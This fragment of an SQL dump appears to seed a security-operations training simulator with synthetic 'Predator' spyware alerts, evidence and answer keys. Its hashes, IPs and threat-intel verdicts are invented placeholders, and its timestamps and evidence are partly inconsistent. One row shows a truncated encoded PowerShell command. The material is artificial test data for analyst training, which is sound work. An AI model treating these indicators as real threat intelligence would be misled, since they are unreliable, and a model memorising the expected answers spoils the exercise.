activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.45.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of suspected compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with frequent DLP alerts.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"HR Records\",\"verdict\":\"clean\",\"details\":\"Active employee, but credentials may be compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"customer_list_secret.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP Logs\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file flagged for 
unusual access and transfer.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.327Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"alert_id\\\":\\\"DL-2023-EXFIL-0005\\\",\\\"detected_action\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filehash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"filename\\\":\\\"customer_list_secret.xlsx\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"exfiltration_size\\\":\\\"2.5GB\\\",\\\"malware_associated\\\":false,\\\"internal_network\\\":true}\"},{\"timestamp\":\"2026-03-15T20:57:15.327Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"alert_id\\\":\\\"DL-2023-EXFIL-0005\\\",\\\"detected_action\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filehash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"filename\\\":\\\"customer_list_secret.xlsx\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"exfiltration_size\\\":\\\"2.5GB\\\",\\\"malware_associated\\\":false,\\\"internal_network\\\":true}\"},{\"timestamp\":\"2026-03-15T20:56:15.327Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"alert_id\\\":\\\"DL-2023-EXFIL-0005\\\",\\\"detected_action\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filehash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"filename\\\":\\\"customer_list_secret.xlsx\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"exfiltration_size\\\":\\\"2.5GB\\\",\\\"malware_associated\\\":false,\\\"internal_network\\\":true}\"},{\"timestamp\":\"2026-03-15T20:55:15.327Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"alert_id\\\":\\\"DL-2023-EXFIL-0005\\\",\\\"detected_action\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filehash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"filename\\\":\\\"customer_list_secret.xlsx\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"exfiltration_size\\\":\\\"2.5GB\\\",\\\"malware_associated\\\":false,\\\"internal_network\\\":true}\"},{\"timestamp\":\"2026-03-15T20:54:15.327Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"alert_id\\\":\\\"DL-2023-EXFIL-0005\\\",\\\"detected_action\\\":\\\"Data Exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filehash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"filename\\\":\\\"customer_list_secret.xlsx\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"exfiltration_size\\\":\\\"2.5GB\\\",\\\"malware_associated\\\":false,\\\"internal_network\\\":true}\"}],\"query\":\"index=main 
source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1517, 'Suspicious Email Attachment Detected', 'medium', 'Email gateway logs', 'A phishing email containing a seemingly harmless attachment was detected. This is the initial access point for the Predator spyware deployment.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T09:45:00Z\",\"email_id\":\"5f8e2b7d-4c7a-4b29-b2e1-1fb0a5b4c3d5\",\"sender\":\"attacker@example.com\",\"recipient\":\"victim@company.com\",\"subject\":\"Urgent: Invoice Attached\",\"attachment\":\"invoice123.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.45\",\"file_analysis\":{\"detected\":true,\"malware_family\":\"Predator\",\"file_behavior\":\"drops malicious payload\"}}', '2026-03-15 19:10:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Email address associated with known phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"invoice123.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File used in phishing email\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Predator malware\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP address involved in previous phishing attacks\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Attachment Detected\",\"date\":\"2026-03-15T20:58:15.332Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1518, 'Zero-click Exploit Triggered', 'critical', 'Endpoint detection and response (EDR) tool', 'A sophisticated zero-click exploit is triggered, allowing the Predator spyware to execute on the target\'s device without any user interaction.', 'Remote Code Execution', 'T1203', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:05Z\",\"event_type\":\"exploit_attempt\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":445,\"malware_name\":\"Predator\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"predator_exploit_payload.dll\",\"username\":\"jdoe\",\"device_id\":\"EDR-001234\",\"signature_id\":\"EXP-2023-0001\",\"exploit_method\":\"zero-click\"}', '2026-03-15 19:10:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with zero-click exploit attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Predator spyware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"predator_exploit_payload.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis System\",\"verdict\":\"malicious\",\"details\":\"Filename used in multiple exploit campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially 
compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1519, 'Spyware Establishes Persistence', 'high', 'System registry analysis', 'Once executed, the Predator spyware establishes persistence on the device, ensuring it remains active even after reboots. The registry key modification is a common persistence mechanism.', 'Persistence Mechanism', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:32:45Z\",\"event_type\":\"registry_modification\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\predator\",\"registry_value\":\"C:\\\\Program Files\\\\Predator\\\\predator.exe\",\"user\":\"admin_user\",\"user_sid\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"host_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.45\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"predator.exe\"}', '2026-03-15 19:10:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"IP belongs to the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious_ip_database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Predator spyware activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Predator spyware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"predator.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_file_list\",\"verdict\":\"malicious\",\"details\":\"Filename associated with Predator spyware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.334Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\predator\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Predator\\\\\\\\predator.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"predator.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.334Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\predator\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Predator\\\\\\\\predator.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"predator.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.334Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\predator\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Predator\\\\\\\\predator.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"predator.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.334Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\predator\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\Predator\\\\\\\\predator.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"predator.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.334Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:32:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\predator\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\Program 
Files\\\\\\\\Predator\\\\\\\\predator.exe\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"predator.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1520, 'Data Exfiltration Detected', 'high', 'Network traffic analysis', 'Anomalous network activity detected indicating potential data exfiltration. The data exfiltration attempt was identified based on abnormal outbound traffic to a known malicious IP address. The attacker likely aimed to transfer sensitive political information from the target device to an external server.', 'Data Breach', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"bytes_sent\":\"10485760\",\"filename\":\"political_activity_report.pdf\",\"username\":\"jdoe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_id\":\"EVT-20231012-0001\"}', '2026-03-15 19:10:11', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_asset_database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised device.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"political_activity_report.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_asset_database\",\"verdict\":\"suspicious\",\"details\":\"File containing potentially sensitive political information.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"antivirus_scan\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used for data 
exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1521, 'Suspicious Phishing Email Detected', 'high', 'Email Gateway Logs', 'A phishing email was detected targeting key personnel with a malicious attachment designed to gain initial access. The email appeared to be sent from a compromised account with a seemingly benign PDF attachment.', 'Initial Access', 'T1566.001 - Phishing: Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T08:15:30Z\",\"email_id\":\"E123456789\",\"sender\":\"compromised_account@externaldomain.com\",\"recipient\":\"john.doe@company.com\",\"subject\":\"Quarterly Report\",\"attachment\":\"Q3_Report.pdf\",\"attachment_hash\":\"b2e98ad6f6eb8508dd6a14cfa704bad7\",\"attachment_size\":\"256KB\",\"source_ip\":\"203.0.113.45\",\"recipient_ip\":\"10.0.0.5\",\"action\":\"Quarantined\",\"reason\":\"Detected malicious attachment\"}', '2026-03-15 19:10:20', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"compromised_account@externaldomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"Q3_Report.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Attachment Analysis\",\"verdict\":\"malicious\",\"details\":\"Contains macro malware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b2e98ad6f6eb8508dd6a14cfa704bad7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by multiple AV engines\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Associated with phishing campaigns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.337Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1522, 'Malware Execution on Mobile Device', 'high', 'Mobile Device Management Logs', 'The spyware was executed on the victim\'s mobile device after an attachment was opened. The malware silently embedded itself into the device\'s system.', 'Execution', 'T1406', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:34Z\",\"device_id\":\"MD-12457\",\"user\":\"johndoe\",\"source_ip\":\"10.0.1.23\",\"external_ip\":\"185.199.108.153\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"invoice.pdf\",\"status\":\"executed\",\"mdm_agent\":\"v5.4.1\",\"event\":\"malware_execution\",\"description\":\"Spyware executed upon opening attachment\",\"detected_by\":\"MDM Security Module\"}', '2026-03-15 19:10:20', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected device.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with malware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known spyware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious filename used to deliver malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"johndoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Username of the victim, no prior malicious 
activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.347Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"device_id\\\":\\\"MD-12457\\\",\\\"user\\\":\\\"johndoe\\\",\\\"source_ip\\\":\\\"10.0.1.23\\\",\\\"external_ip\\\":\\\"185.199.108.153\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"invoice.pdf\\\",\\\"status\\\":\\\"executed\\\",\\\"mdm_agent\\\":\\\"v5.4.1\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"description\\\":\\\"Spyware executed upon opening attachment\\\",\\\"detected_by\\\":\\\"MDM Security Module\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.347Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"device_id\\\":\\\"MD-12457\\\",\\\"user\\\":\\\"johndoe\\\",\\\"source_ip\\\":\\\"10.0.1.23\\\",\\\"external_ip\\\":\\\"185.199.108.153\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"invoice.pdf\\\",\\\"status\\\":\\\"executed\\\",\\\"mdm_agent\\\":\\\"v5.4.1\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"description\\\":\\\"Spyware executed upon opening attachment\\\",\\\"detected_by\\\":\\\"MDM Security Module\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.347Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"device_id\\\":\\\"MD-12457\\\",\\\"user\\\":\\\"johndoe\\\",\\\"source_ip\\\":\\\"10.0.1.23\\\",\\\"external_ip\\\":\\\"185.199.108.153\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"invoice.pdf\\\",\\\"status\\\":\\\"executed\\\",\\\"mdm_agent\\\":\\\"v5.4.1\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"description\\\":\\\"Spyware executed upon opening attachment\\\",\\\"detected_by\\\":\\\"MDM Security 